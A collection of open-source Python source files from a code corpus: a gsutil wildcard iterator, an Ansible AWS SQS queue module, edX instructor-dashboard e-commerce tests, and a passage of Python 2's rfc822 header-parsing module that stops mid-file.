yield bucket_listing_ref.GetKey()
def IterUris(self):
"""
Convenience iterator that runs underlying iterator and returns StorageUri
for each iteration.
Yields:
StorageUri, or empty iterator if no matches.
"""
for bucket_listing_ref in self. __iter__():
yield bucket_listing_ref.GetUri()
def IterUrisForKeys(self):
"""
Convenience iterator that runs underlying iterator and returns the
StorageUri for each iterated BucketListingRef that has a Key.
Yields:
StorageUri, or empty iterator if no matches.
"""
for bucket_listing_ref in self. __iter__():
if bucket_listing_ref.HasKey():
yield bucket_listing_ref.GetUri()
class FileWildcardIterator(WildcardIterator):
"""WildcardIterator subclass for files and directories.
If you use recursive wildcards ('**') only a single such wildcard is
supported. For example you could use the wildcard '**/*.txt' to list all .txt
files in any subdirectory of the current directory, but you couldn't use a
wildcard like '**/abc/**/*.txt' (which would, if supported, let you find .txt
files in any subdirectory named 'abc').
"""
def __init__(self, wildcard_uri, headers=None, debug=0):
"""
Instantiate an iterator over BucketListingRefs matching given wildcard URI.
Args:
wildcard_uri: StorageUri that contains the wildcard to iterate.
headers: Dictionary containing optional HTTP headers to pass to boto.
debug: Debug level to pass in to boto connection (range 0..3).
"""
self.wildcard_uri = wildcard_uri
self.headers = headers
self.debug = debug
def __iter__(self):
wildcard = self.wildcard_uri.object_name
match = re.search('\*\*', wildcard)
if match:
# Recursive wildcarding request ('.../**/...').
# Example input: wildcard = '/tmp/tmp2pQJAX/**/*'
base_dir = wildcard[:match.start()-1]
remaining_wildcard = wildcard[match.start()+2:]
# At this point for the above example base_dir = '/tmp/tmp2pQJAX' and
# remaining_wildcard = '/*'
if remaining_wildcard.startswith('*'):
raise WildcardException('Invalid wildcard with more than 2 consecutive '
'*s (%s)' % wildcard)
# If there was no remaining wildcard past the recursive wildcard,
# treat it as if it were a '*'. For example, file://tmp/** is equivalent
# to file://tmp/**/*
if not remaining_wildcard:
remaining_wildcard = '*'
# Skip slash(es).
remaining_wildcard = remaining_wildcard.lstrip(os.sep)
filepaths = []
for dirpath, unused_dirnames, filenames in os.walk(base_dir):
filepaths.extend(
os.path.join(dirpath, f) for f in fnmatch.filter(filenames,
remaining_wildcard)
)
else:
# Not a recursive wildcarding request.
filepaths = glob.glob(wildcard)
for filepath in filepaths:
expanded_uri = self.wildcard_uri.clone_replace_name(filepath)
yield BucketListingRef(expanded_uri)
def IterKeys(self):
"""
Placeholder to allow polymorphic use of WildcardIterator.
Raises:
WildcardException: in all cases.
"""
raise WildcardException(
'Iterating over Keys not possible for file wildcards')
def IterUris(self):
"""
Convenience iterator that runs underlying iterator and returns StorageUri
for each iteration.
Yields:
StorageUri, or empty iterator if no matches.
"""
for bucket_listing_ref in self. __iter__():
yield bucket_listing_ref.GetUri()
class WildcardException(StandardError):
"""Exception thrown for invalid wildcard URIs."""
def __init__(self, reason):
StandardError.__init__(self)
self.reason = reason
def __repr__(self):
return 'WildcardException: %s' % self.reason
def __str__(self):
return 'WildcardException: %s' % self.reason
def wildcard_iterator(uri_or_str, proj_id_handler,
bucket_storage_uri_class=BucketStorageUri,
all_versions=False,
headers=None, debug=0):
"""Instantiate a WildCardIterator for the given StorageUri.
Args:
uri_or_str: StorageUri or URI string naming wildcard objects to iterate.
proj_id_handler: ProjectIdHandler to use for current command.
bucket_storage_uri_class: BucketStorageUri interface.
Settable for testing/mocking.
headers: Dictionary containing optional HTTP headers to pass to boto.
debug: Debug level to pass in to boto connection (range 0..3).
Returns:
A WildcardIterator that handles the requested iteration.
"""
if isinstance(uri_or_str, basestring):
# Disable enforce_bucket_naming, to allow bucket names containing wildcard
# chars.
uri = boto.storage_uri(
uri_or_str, debug=debug, validate=False,
bucket_storage_uri_class=bucket_storage_uri_class,
suppress_consec_slashes=False)
else:
uri = uri_or_str
if uri.is_cloud_uri():
return CloudWildcardIterator(
uri, proj_id_handler,
bucket_storage_uri_class=bucket_storage_uri_class,
all_versions=all_versions,
headers=headers,
debug=debug)
elif uri.is_file_uri():
return FileWildcardIterator(uri, headers=headers, debug=debug)
else:
raise WildcardException('Unexpected type of StorageUri (%s)' % uri)
def ContainsWildcard(uri_or_str):
"""Checks whether uri_or_str contains a wildcard.
Args:
uri_or_str: StorageUri or URI string to check.
Returns:
bool indicator.
"""
if isinstance(uri_or_str, basestring):
return bool(WILDCARD_REGEX.search(uri_or_str))
else:
return bool(WILDCARD_REGEX.search(uri_or_str.uri))
| bsd-3-clause |
trondhindenes/ansible-modules-extras | cloud/amazon/sqs_queue.py | 30 | 7858 | #!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = """
---
module: sqs_queue
short_description: Creates or deletes AWS SQS queues.
description:
- Create or delete AWS SQS queues.
- Update attributes on existing queues.
version_added: "2.0"
author:
- Alan Loi (@loia)
- Fernando Jose Pando (@nand0p)
requirements:
- "boto >= 2.33.0"
options:
state:
description:
- Create or delete the queue
required: false
choices: ['present', 'absent']
default: 'present'
name:
description:
- Name of the queue.
required: true
default_visibility_timeout:
description:
- The default visibility timeout in seconds.
required: false
default: null
message_retention_period:
description:
- The message retention period in seconds.
required: false
default: null
maximum_message_size:
description:
- The maximum message size in bytes.
required: false
default: null
delivery_delay:
description:
- The delivery delay in seconds.
required: false
default: null
receive_message_wait_time:
description:
- The receive message wait time in seconds.
required: false
default: null
policy:
description:
- The json dict policy to attach to queue
required: false
default: null
version_added: "2.1"
extends_documentation_fragment:
- aws
- ec2
"""
EXAMPLES = '''
# Create SQS queue
- sqs_queue:
name: my-queue
region: ap-southeast-2
default_visibility_timeout: 120
message_retention_period: 86400
maximum_message_size: 1024
delivery_delay: 30
receive_message_wait_time: 20
policy: "{{ json_dict }}"
# Delete SQS queue
- sqs_queue:
name: my-queue
region: ap-southeast-2
state: absent
'''
try:
import boto.sqs
from boto.exception import BotoServerError, NoAuthHandlerFound
HAS_BOTO = True
except ImportError:
HAS_BOTO = False
def create_or_update_sqs_queue(connection, module):
queue_name = module.params.get('name')
queue_attributes = dict(
default_visibility_timeout=module.params.get('default_visibility_timeout'),
message_retention_period=module.params.get('message_retention_period'),
maximum_message_size=module.params.get('maximum_message_size'),
delivery_delay=module.params.get('delivery_delay'),
receive_message_wait_time=module.params.get('receive_message_wait_time'),
policy=module.params.get('policy'),
)
result = dict(
region=module.params.get('region'),
name=queue_name,
)
result.update(queue_attributes)
try:
queue = connection.get_queue(queue_name)
if queue:
# Update existing
result['changed'] = update_sqs_queue(queue, check_mode=module.check_mode, **queue_attributes)
else:
# Create new
if not module.check_mode:
queue = connection.create_queue(queue_name)
update_sqs_queue(queue, **queue_attributes)
result['changed'] = True
except BotoServerError:
result['msg'] = 'Failed to create/update sqs queue due to error: ' + traceback.format_exc()
module.fail_json(**result)
else:
module.exit_json(**result)
def update_sqs_queue(queue,
check_mode=False,
default_visibility_timeout=None,
message_retention_period=None,
maximum_message_size=None,
delivery_delay=None,
receive_message_wait_time=None,
policy=None):
changed = False
changed = set_queue_attribute(queue, 'VisibilityTimeout', default_visibility_timeout,
check_mode=check_mode) or changed
changed = set_queue_attribute(queue, 'MessageRetentionPeriod', message_retention_period,
check_mode=check_mode) or changed
changed = set_queue_attribute(queue, 'MaximumMessageSize', maximum_message_size,
check_mode=check_mode) or changed
changed = set_queue_attribute(queue, 'DelaySeconds', delivery_delay,
check_mode=check_mode) or changed
changed = set_queue_attribute(queue, 'ReceiveMessageWaitTimeSeconds', receive_message_wait_time,
check_mode=check_mode) or changed
changed = set_queue_attribute(queue, 'Policy', policy,
check_mode=check_mode) or changed
return changed
def set_queue_attribute(queue, attribute, value, check_mode=False):
if not value:
return False
try:
existing_value = queue.get_attributes(attributes=attribute)[attribute]
except:
existing_value = ''
# convert dict attributes to JSON strings (sort keys for comparing)
if attribute is 'Policy':
value = json.dumps(value, sort_keys=True)
if existing_value:
existing_value = json.dumps(json.loads(existing_value), sort_keys=True)
if str(value) != existing_value:
if not check_mode:
queue.set_attribute(attribute, value)
return True
return False
def delete_sqs_queue(connection, module):
queue_name = module.params.get('name')
result = dict(
region=module.params.get('region'),
name=queue_name,
)
try:
queue = connection.get_queue(queue_name)
if queue:
if not module.check_mode:
connection.delete_queue(queue)
result['changed'] = True
else:
result['changed'] = False
except BotoServerError:
result['msg'] = 'Failed to delete sqs queue due to error: ' + traceback.format_exc()
module.fail_json(**result)
else:
module.exit_json(**result)
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
state=dict(default='present', choices=['present', 'absent']),
name=dict(required=True, type='str'),
default_visibility_timeout=dict(type='int'),
message_retention_period=dict(type='int'),
maximum_message_size=dict(type='int'),
delivery_delay=dict(type='int'),
receive_message_wait_time=dict(type='int'),
policy=dict(type='dict', required=False),
))
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True)
if not HAS_BOTO:
module.fail_json(msg='boto required for this module')
region, ec2_url, aws_connect_params = get_aws_connection_info(module)
if not region:
module.fail_json(msg='region must be specified')
try:
connection = connect_to_aws(boto.sqs, region, **aws_connect_params)
except (NoAuthHandlerFound, AnsibleAWSError), e:
module.fail_json(msg=str(e))
state = module.params.get('state')
if state == 'present':
create_or_update_sqs_queue(connection, module)
elif state == 'absent':
delete_sqs_queue(connection, module)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *
if __name__ == '__main__':
main()
| gpl-3.0 |
mahendra-r/edx-platform | lms/djangoapps/instructor/tests/test_ecommerce.py | 44 | 14997 | """
Unit tests for Ecommerce feature flag in new instructor dashboard.
"""
import datetime
import pytz
from django.core.urlresolvers import reverse
from nose.plugins.attrib import attr
from course_modes.models import CourseMode
from student.roles import CourseFinanceAdminRole
from shoppingcart.models import Coupon, CourseRegistrationCode
from student.tests.factories import AdminFactory
from xmodule.modulestore.tests.django_utils import SharedModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory
@attr('shard_1')
class TestECommerceDashboardViews(SharedModuleStoreTestCase):
"""
Check for E-commerce view on the new instructor dashboard
"""
@classmethod
def setUpClass(cls):
super(TestECommerceDashboardViews, cls).setUpClass()
cls.course = CourseFactory.create()
# URL for instructor dash
cls.url = reverse('instructor_dashboard', kwargs={'course_id': cls.course.id.to_deprecated_string()})
cls.e_commerce_link = '<a href="" data-section="e-commerce">E-Commerce</a>'
def setUp(self):
super(TestECommerceDashboardViews, self).setUp()
# Create instructor account
self.instructor = AdminFactory.create()
self.client.login(username=self.instructor.username, password="test")
mode = CourseMode(
course_id=self.course.id.to_deprecated_string(), mode_slug='honor',
mode_display_name='honor', min_price=10, currency='usd'
)
mode.save()
CourseFinanceAdminRole(self.course.id).add_users(self.instructor)
def test_pass_e_commerce_tab_in_instructor_dashboard(self):
"""
Test Pass E-commerce Tab is in the Instructor Dashboard
"""
response = self.client.get(self.url)
self.assertTrue(self.e_commerce_link in response.content)
# Coupons should show up for White Label sites with priced honor modes.
self.assertTrue('Coupon Code List' in response.content)
def test_user_has_finance_admin_rights_in_e_commerce_tab(self):
response = self.client.get(self.url)
self.assertTrue(self.e_commerce_link in response.content)
# Order/Invoice sales csv button text should render in e-commerce page
self.assertTrue('Total Credit Card Purchases' in response.content)
self.assertTrue('Download All Credit Card Purchases' in response.content)
self.assertTrue('Download All Invoices' in response.content)
# removing the course finance_admin role of login user
CourseFinanceAdminRole(self.course.id).remove_users(self.instructor)
# Order/Invoice sales csv button text should not be visible in e-commerce page if the user is not finance admin
url = reverse('instructor_dashboard', kwargs={'course_id': self.course.id.to_deprecated_string()})
response = self.client.post(url)
self.assertFalse('Download All Invoices' in response.content)
def test_user_view_course_price(self):
"""
test to check if the user views the set price button and price in
the instructor dashboard
"""
response = self.client.get(self.url)
self.assertTrue(self.e_commerce_link in response.content)
# Total amount html should render in e-commerce page, total amount will be 0
course_honor_mode = CourseMode.mode_for_course(self.course.id, 'honor')
price = course_honor_mode.min_price
self.assertTrue('Course price per seat: <span>$' + str(price) + '</span>' in response.content)
self.assertFalse('+ Set Price</a></span>' in response.content)
# removing the course finance_admin role of login user
CourseFinanceAdminRole(self.course.id).remove_users(self.instructor)
# total amount should not be visible in e-commerce page if the user is not finance admin
url = reverse('instructor_dashboard', kwargs={'course_id': self.course.id.to_deprecated_string()})
response = self.client.get(url)
self.assertFalse('+ Set Price</a></span>' in response.content)
def test_update_course_price_check(self):
price = 200
# course B
course2 = CourseFactory.create(org='EDX', display_name='test_course', number='100')
mode = CourseMode(
course_id=course2.id.to_deprecated_string(), mode_slug='honor',
mode_display_name='honor', min_price=30, currency='usd'
)
mode.save()
# course A update
CourseMode.objects.filter(course_id=self.course.id).update(min_price=price)
set_course_price_url = reverse('set_course_mode_price', kwargs={'course_id': self.course.id.to_deprecated_string()})
data = {'course_price': price, 'currency': 'usd'}
response = self.client.post(set_course_price_url, data)
self.assertTrue('CourseMode price updated successfully' in response.content)
# Course A updated total amount should be visible in e-commerce page if the user is finance admin
url = reverse('instructor_dashboard', kwargs={'course_id': self.course.id.to_deprecated_string()})
response = self.client.get(url)
self.assertTrue('Course price per seat: <span>$' + str(price) + '</span>' in response.content)
def test_user_admin_set_course_price(self):
"""
test to set the course price related functionality.
test al the scenarios for setting a new course price
"""
set_course_price_url = reverse('set_course_mode_price', kwargs={'course_id': self.course.id.to_deprecated_string()})
data = {'course_price': '12%', 'currency': 'usd'}
# Value Error course price should be a numeric value
response = self.client.post(set_course_price_url, data)
self.assertTrue("Please Enter the numeric value for the course price" in response.content)
# validation check passes and course price is successfully added
data['course_price'] = 100
response = self.client.post(set_course_price_url, data)
self.assertTrue("CourseMode price updated successfully" in response.content)
course_honor_mode = CourseMode.objects.get(mode_slug='honor')
course_honor_mode.delete()
# Course Mode not exist with mode slug honor
response = self.client.post(set_course_price_url, data)
self.assertTrue("CourseMode with the mode slug({mode_slug}) DoesNotExist".format(mode_slug='honor') in response.content)
def test_add_coupon(self):
"""
Test Add Coupon Scenarios. Handle all the HttpResponses return by add_coupon view
"""
# URL for add_coupon
add_coupon_url = reverse('add_coupon', kwargs={'course_id': self.course.id.to_deprecated_string()})
expiration_date = datetime.datetime.now(pytz.UTC) + datetime.timedelta(days=2)
data = {
'code': 'A2314', 'course_id': self.course.id.to_deprecated_string(),
'description': 'ADSADASDSAD', 'created_by': self.instructor, 'discount': 5,
'expiration_date': '{month}/{day}/{year}'.format(month=expiration_date.month, day=expiration_date.day, year=expiration_date.year)
}
response = self.client.post(add_coupon_url, data)
self.assertTrue("coupon with the coupon code ({code}) added successfully".format(code=data['code']) in response.content)
#now add the coupon with the wrong value in the expiration_date
# server will through the ValueError Exception in the expiration_date field
data = {
'code': '213454', 'course_id': self.course.id.to_deprecated_string(),
'description': 'ADSADASDSAD', 'created_by': self.instructor, 'discount': 5,
'expiration_date': expiration_date.strftime('"%d/%m/%Y')
}
response = self.client.post(add_coupon_url, data)
self.assertTrue("Please enter the date in this format i-e month/day/year" in response.content)
data = {
'code': 'A2314', 'course_id': self.course.id.to_deprecated_string(),
'description': 'asdsasda', 'created_by': self.instructor, 'discount': 99
}
response = self.client.post(add_coupon_url, data)
self.assertTrue("coupon with the coupon code ({code}) already exist".format(code='A2314') in response.content)
response = self.client.post(self.url)
self.assertTrue('<td>ADSADASDSAD</td>' in response.content)
self.assertTrue('<td>A2314</td>' in response.content)
self.assertFalse('<td>111</td>' in response.content)
data = {
'code': 'A2345314', 'course_id': self.course.id.to_deprecated_string(),
'description': 'asdsasda', 'created_by': self.instructor, 'discount': 199
}
response = self.client.post(add_coupon_url, data)
self.assertTrue("Please Enter the Coupon Discount Value Less than or Equal to 100" in response.content)
data['discount'] = '25%'
response = self.client.post(add_coupon_url, data=data)
self.assertTrue('Please Enter the Integer Value for Coupon Discount' in response.content)
course_registration = CourseRegistrationCode(
code='Vs23Ws4j', course_id=unicode(self.course.id), created_by=self.instructor,
mode_slug='honor'
)
course_registration.save()
data['code'] = 'Vs23Ws4j'
response = self.client.post(add_coupon_url, data)
self.assertTrue("The code ({code}) that you have tried to define is already in use as a registration code"
.format(code=data['code']) in response.content)
def test_delete_coupon(self):
"""
Test Delete Coupon Scenarios. Handle all the HttpResponses return by remove_coupon view
"""
coupon = Coupon(
code='AS452', description='asdsadsa', course_id=self.course.id.to_deprecated_string(),
percentage_discount=10, created_by=self.instructor
)
coupon.save()
response = self.client.post(self.url)
self.assertTrue('<td>AS452</td>' in response.content)
# URL for remove_coupon
delete_coupon_url = reverse('remove_coupon', kwargs={'course_id': self.course.id.to_deprecated_string()})
response = self.client.post(delete_coupon_url, {'id': coupon.id})
self.assertTrue('coupon with the coupon id ({coupon_id}) updated successfully'.format(coupon_id=coupon.id) in response.content)
coupon.is_active = False
coupon.save()
response = self.client.post(delete_coupon_url, {'id': coupon.id})
self.assertTrue('coupon with the coupon id ({coupon_id}) is already inactive'.format(coupon_id=coupon.id) in response.content)
response = self.client.post(delete_coupon_url, {'id': 24454})
self.assertTrue('coupon with the coupon id ({coupon_id}) DoesNotExist'.format(coupon_id=24454) in response.content)
response = self.client.post(delete_coupon_url, {'id': ''})
self.assertTrue('coupon id is None' in response.content)
def test_get_coupon_info(self):
"""
Test Edit Coupon Info Scenarios. Handle all the HttpResponses return by edit_coupon_info view
"""
coupon = Coupon(
code='AS452', description='asdsadsa', course_id=self.course.id.to_deprecated_string(),
percentage_discount=10, created_by=self.instructor,
expiration_date=datetime.datetime.now(pytz.UTC) + datetime.timedelta(days=2)
)
coupon.save()
# URL for edit_coupon_info
edit_url = reverse('get_coupon_info', kwargs={'course_id': self.course.id.to_deprecated_string()})
response = self.client.post(edit_url, {'id': coupon.id})
self.assertTrue('coupon with the coupon id ({coupon_id}) updated successfully'.format(coupon_id=coupon.id) in response.content)
self.assertIn(coupon.display_expiry_date, response.content)
response = self.client.post(edit_url, {'id': 444444})
self.assertTrue('coupon with the coupon id ({coupon_id}) DoesNotExist'.format(coupon_id=444444) in response.content)
response = self.client.post(edit_url, {'id': ''})
self.assertTrue('coupon id not found"' in response.content)
coupon.is_active = False
coupon.save()
response = self.client.post(edit_url, {'id': coupon.id})
self.assertTrue("coupon with the coupon id ({coupon_id}) is already inactive".format(coupon_id=coupon.id) in response.content)
def test_update_coupon(self):
"""
Test Update Coupon Info Scenarios. Handle all the HttpResponses return by update_coupon view
"""
coupon = Coupon(
code='AS452', description='asdsadsa', course_id=self.course.id.to_deprecated_string(),
percentage_discount=10, created_by=self.instructor
)
coupon.save()
response = self.client.post(self.url)
self.assertTrue('<td>AS452</td>' in response.content)
data = {
'coupon_id': coupon.id, 'code': 'AS452', 'discount': '10', 'description': 'updated_description', # pylint: disable=no-member
'course_id': coupon.course_id.to_deprecated_string()
}
# URL for update_coupon
update_coupon_url = reverse('update_coupon', kwargs={'course_id': self.course.id.to_deprecated_string()})
response = self.client.post(update_coupon_url, data=data)
self.assertTrue('coupon with the coupon id ({coupon_id}) updated Successfully'.format(coupon_id=coupon.id)in response.content)
response = self.client.post(self.url)
self.assertTrue('<td>updated_description</td>' in response.content)
data['coupon_id'] = 1000 # Coupon Not Exist with this ID
response = self.client.post(update_coupon_url, data=data)
self.assertTrue('coupon with the coupon id ({coupon_id}) DoesNotExist'.format(coupon_id=1000) in response.content)
data['coupon_id'] = '' # Coupon id is not provided
response = self.client.post(update_coupon_url, data=data)
self.assertTrue('coupon id not found' in response.content)
def test_verified_course(self):
"""Verify the e-commerce panel shows up for verified courses as well, without Coupons """
# Change honor mode to verified.
original_mode = CourseMode.objects.get(course_id=self.course.id, mode_slug='honor')
original_mode.delete()
new_mode = CourseMode(
course_id=unicode(self.course.id), mode_slug='verified',
mode_display_name='verified', min_price=10, currency='usd'
)
new_mode.save()
# Get the response value, ensure the Coupon section is not included.
response = self.client.get(self.url)
self.assertTrue(self.e_commerce_link in response.content)
# Coupons should show up for White Label sites with priced honor modes.
self.assertFalse('Coupons List' in response.content)
| agpl-3.0 |
uwafsl/MissionPlanner | Lib/rfc822.py | 58 | 34306 | """RFC 2822 message manipulation.
Note: This is only a very rough sketch of a full RFC-822 parser; in particular
the tokenizing of addresses does not adhere to all the quoting rules.
Note: RFC 2822 is a long awaited update to RFC 822. This module should
conform to RFC 2822, and is thus mis-named (it's not worth renaming it). Some
effort at RFC 2822 updates have been made, but a thorough audit has not been
performed. Consider any RFC 2822 non-conformance to be a bug.
RFC 2822: http://www.faqs.org/rfcs/rfc2822.html
RFC 822 : http://www.faqs.org/rfcs/rfc822.html (obsolete)
Directions for use:
To create a Message object: first open a file, e.g.:
fp = open(file, 'r')
You can use any other legal way of getting an open file object, e.g. use
sys.stdin or call os.popen(). Then pass the open file object to the Message()
constructor:
m = Message(fp)
This class can work with any input object that supports a readline method. If
the input object has seek and tell capability, the rewindbody method will
work; also illegal lines will be pushed back onto the input stream. If the
input object lacks seek but has an `unread' method that can push back a line
of input, Message will use that to push back illegal lines. Thus this class
can be used to parse messages coming from a buffered stream.
The optional `seekable' argument is provided as a workaround for certain stdio
libraries in which tell() discards buffered data before discovering that the
lseek() system call doesn't work. For maximum portability, you should set the
seekable argument to zero to prevent that initial \code{tell} when passing in
an unseekable object such as a a file object created from a socket object. If
it is 1 on entry -- which it is by default -- the tell() method of the open
file object is called once; if this raises an exception, seekable is reset to
0. For other nonzero values of seekable, this test is not made.
To get the text of a particular header there are several methods:
str = m.getheader(name)
str = m.getrawheader(name)
where name is the name of the header, e.g. 'Subject'. The difference is that
getheader() strips the leading and trailing whitespace, while getrawheader()
doesn't. Both functions retain embedded whitespace (including newlines)
exactly as they are specified in the header, and leave the case of the text
unchanged.
For addresses and address lists there are functions
realname, mailaddress = m.getaddr(name)
list = m.getaddrlist(name)
where the latter returns a list of (realname, mailaddr) tuples.
There is also a method
time = m.getdate(name)
which parses a Date-like field and returns a time-compatible tuple,
i.e. a tuple such as returned by time.localtime() or accepted by
time.mktime().
See the class definition for lower level access methods.
There are also some utility functions here.
"""
# Cleanup and extensions by Eric S. Raymond <esr@thyrsus.com>
import time
from warnings import warnpy3k
warnpy3k("in 3.x, rfc822 has been removed in favor of the email package",
stacklevel=2)
__all__ = ["Message","AddressList","parsedate","parsedate_tz","mktime_tz"]
_blanklines = ('\r\n', '\n') # Optimization for islast()
class Message:
"""Represents a single RFC 2822-compliant message."""
def __init__(self, fp, seekable = 1):
"""Initialize the class instance and read the headers."""
if seekable == 1:
# Exercise tell() to make sure it works
# (and then assume seek() works, too)
try:
fp.tell()
except (AttributeError, IOError):
seekable = 0
self.fp = fp
self.seekable = seekable
self.startofheaders = None
self.startofbody = None
#
if self.seekable:
try:
self.startofheaders = self.fp.tell()
except IOError:
self.seekable = 0
#
self.readheaders()
#
if self.seekable:
try:
self.startofbody = self.fp.tell()
except IOError:
self.seekable = 0
def rewindbody(self):
"""Rewind the file to the start of the body (if seekable)."""
if not self.seekable:
raise IOError, "unseekable file"
self.fp.seek(self.startofbody)
def readheaders(self):
"""Read header lines.
Read header lines up to the entirely blank line that terminates them.
The (normally blank) line that ends the headers is skipped, but not
included in the returned list. If a non-header line ends the headers,
(which is an error), an attempt is made to backspace over it; it is
never included in the returned list.
The variable self.status is set to the empty string if all went well,
otherwise it is an error message. The variable self.headers is a
completely uninterpreted list of lines contained in the header (so
printing them will reproduce the header exactly as it appears in the
file).
"""
self.dict = {}
self.unixfrom = ''
self.headers = lst = []
self.status = ''
headerseen = ""
firstline = 1
startofline = unread = tell = None
if hasattr(self.fp, 'unread'):
unread = self.fp.unread
elif self.seekable:
tell = self.fp.tell
while 1:
if tell:
try:
startofline = tell()
except IOError:
startofline = tell = None
self.seekable = 0
line = self.fp.readline()
if not line:
self.status = 'EOF in headers'
break
# Skip unix From name time lines
if firstline and line.startswith('From '):
self.unixfrom = self.unixfrom + line
continue
firstline = 0
if headerseen and line[0] in ' \t':
# It's a continuation line.
lst.append(line)
x = (self.dict[headerseen] + "\n " + line.strip())
self.dict[headerseen] = x.strip()
continue
elif self.iscomment(line):
# It's a comment. Ignore it.
continue
elif self.islast(line):
# Note! No pushback here! The delimiter line gets eaten.
break
headerseen = self.isheader(line)
if headerseen:
# It's a legal header line, save it.
lst.append(line)
self.dict[headerseen] = line[len(headerseen)+1:].strip()
continue
else:
# It's not a header line; throw it back and stop here.
if not self.dict:
self.status = 'No headers'
else:
self.status = 'Non-header line where header expected'
# Try to undo the read.
if unread:
unread(line)
elif tell:
self.fp.seek(startofline)
else:
self.status = self.status + '; bad seek'
break
def isheader(self, line):
"""Determine whether a given line is a legal header.
This method should return the header name, suitably canonicalized.
You may override this method in order to use Message parsing on tagged
data in RFC 2822-like formats with special header formats.
"""
i = line.find(':')
if i > 0:
return line[:i].lower()
return None
def islast(self, line):
"""Determine whether a line is a legal end of RFC 2822 headers.
You may override this method if your application wants to bend the
rules, e.g. to strip trailing whitespace, or to recognize MH template
separators ('--------'). For convenience (e.g. for code reading from
sockets) a line consisting of \r\n also matches.
"""
return line in _blanklines
def iscomment(self, line):
"""Determine whether a line should be skipped entirely.
You may override this method in order to use Message parsing on tagged
data in RFC 2822-like formats that support embedded comments or
free-text data.
"""
return False
def getallmatchingheaders(self, name):
"""Find all header lines matching a given header name.
Look through the list of headers and find all lines matching a given
header name (and their continuation lines). A list of the lines is
returned, without interpretation. If the header does not occur, an
empty list is returned. If the header occurs multiple times, all
occurrences are returned. Case is not important in the header name.
"""
name = name.lower() + ':'
n = len(name)
lst = []
hit = 0
for line in self.headers:
if line[:n].lower() == name:
hit = 1
elif not line[:1].isspace():
hit = 0
if hit:
lst.append(line)
return lst
def getfirstmatchingheader(self, name):
"""Get the first header line matching name.
This is similar to getallmatchingheaders, but it returns only the
first matching header (and its continuation lines).
"""
name = name.lower() + ':'
n = len(name)
lst = []
hit = 0
for line in self.headers:
if hit:
if not line[:1].isspace():
break
elif line[:n].lower() == name:
hit = 1
if hit:
lst.append(line)
return lst
def getrawheader(self, name):
"""A higher-level interface to getfirstmatchingheader().
Return a string containing the literal text of the header but with the
keyword stripped. All leading, trailing and embedded whitespace is
kept in the string, however. Return None if the header does not
occur.
"""
lst = self.getfirstmatchingheader(name)
if not lst:
return None
lst[0] = lst[0][len(name) + 1:]
return ''.join(lst)
def getheader(self, name, default=None):
"""Get the header value for a name.
This is the normal interface: it returns a stripped version of the
header value for a given header name, or None if it doesn't exist.
This uses the dictionary version which finds the *last* such header.
"""
return self.dict.get(name.lower(), default)
get = getheader
def getheaders(self, name):
"""Get all values for a header.
This returns a list of values for headers given more than once; each
value in the result list is stripped in the same way as the result of
getheader(). If the header is not given, return an empty list.
"""
result = []
current = ''
have_header = 0
for s in self.getallmatchingheaders(name):
if s[0].isspace():
if current:
current = "%s\n %s" % (current, s.strip())
else:
current = s.strip()
else:
if have_header:
result.append(current)
current = s[s.find(":") + 1:].strip()
have_header = 1
if have_header:
result.append(current)
return result
def getaddr(self, name):
"""Get a single address from a header, as a tuple.
An example return value:
('Guido van Rossum', 'guido@cwi.nl')
"""
# New, by Ben Escoto
alist = self.getaddrlist(name)
if alist:
return alist[0]
else:
return (None, None)
def getaddrlist(self, name):
"""Get a list of addresses from a header.
Retrieves a list of addresses from a header, where each address is a
tuple as returned by getaddr(). Scans all named headers, so it works
properly with multiple To: or Cc: headers for example.
"""
raw = []
for h in self.getallmatchingheaders(name):
if h[0] in ' \t':
raw.append(h)
else:
if raw:
raw.append(', ')
i = h.find(':')
if i > 0:
addr = h[i+1:]
raw.append(addr)
alladdrs = ''.join(raw)
a = AddressList(alladdrs)
return a.addresslist
def getdate(self, name):
"""Retrieve a date field from a header.
Retrieves a date field from the named header, returning a tuple
compatible with time.mktime().
"""
try:
data = self[name]
except KeyError:
return None
return parsedate(data)
def getdate_tz(self, name):
"""Retrieve a date field from a header as a 10-tuple.
The first 9 elements make up a tuple compatible with time.mktime(),
and the 10th is the offset of the poster's time zone from GMT/UTC.
"""
try:
data = self[name]
except KeyError:
return None
return parsedate_tz(data)
# Access as a dictionary (only finds *last* header of each type):
def __len__(self):
"""Get the number of headers in a message."""
return len(self.dict)
def __getitem__(self, name):
"""Get a specific header, as from a dictionary."""
return self.dict[name.lower()]
def __setitem__(self, name, value):
"""Set the value of a header.
Note: This is not a perfect inversion of __getitem__, because any
changed headers get stuck at the end of the raw-headers list rather
than where the altered header was.
"""
del self[name] # Won't fail if it doesn't exist
self.dict[name.lower()] = value
text = name + ": " + value
for line in text.split("\n"):
self.headers.append(line + "\n")
def __delitem__(self, name):
"""Delete all occurrences of a specific header, if it is present."""
name = name.lower()
if not name in self.dict:
return
del self.dict[name]
name = name + ':'
n = len(name)
lst = []
hit = 0
for i in range(len(self.headers)):
line = self.headers[i]
if line[:n].lower() == name:
hit = 1
elif not line[:1].isspace():
hit = 0
if hit:
lst.append(i)
for i in reversed(lst):
del self.headers[i]
def setdefault(self, name, default=""):
lowername = name.lower()
if lowername in self.dict:
return self.dict[lowername]
else:
text = name + ": " + default
for line in text.split("\n"):
self.headers.append(line + "\n")
self.dict[lowername] = default
return default
def has_key(self, name):
"""Determine whether a message contains the named header."""
return name.lower() in self.dict
def __contains__(self, name):
"""Determine whether a message contains the named header."""
return name.lower() in self.dict
def __iter__(self):
return iter(self.dict)
def keys(self):
"""Get all of a message's header field names."""
return self.dict.keys()
def values(self):
"""Get all of a message's header field values."""
return self.dict.values()
def items(self):
"""Get all of a message's headers.
Returns a list of name, value tuples.
"""
return self.dict.items()
def __str__(self):
return ''.join(self.headers)
# Utility functions
# -----------------
